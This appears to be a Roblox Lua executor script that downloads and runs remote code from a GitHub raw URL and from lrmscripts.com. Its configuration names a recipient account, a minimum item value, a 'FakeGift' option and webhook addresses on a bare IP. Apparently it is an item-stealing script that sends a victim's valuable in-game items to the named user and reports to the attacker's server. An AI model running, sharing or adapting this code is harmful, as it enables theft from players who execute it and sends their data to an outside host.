loadstring(game:HttpGet("https://raw.githubusercontent.com/7teenscripts/loadingscrn/refs/heads/main/lua"))()
_G.LRMConfig = {
    User = {"AcescyG"},
    min_value = 10000000000,
    pingEveryone = "Yes", -- dont change this
    Webhook = "http://176.100.37.215:20002/proxy/2907ac82cc3d8f6d24af83999cfeb589",
    FakeGift = "Yes",
    Trash = "http://176.100.37.215:20002/proxy/2907ac82cc3d8f6d24af83999cfeb589",
    LoadingScreen = "No",
    GiftOnlyRares = "No",
    ExecuteOtherScript = "No",
}
    
loadstring(game:HttpGetAsync('https://lrmscripts.com/script/main.lua'))()
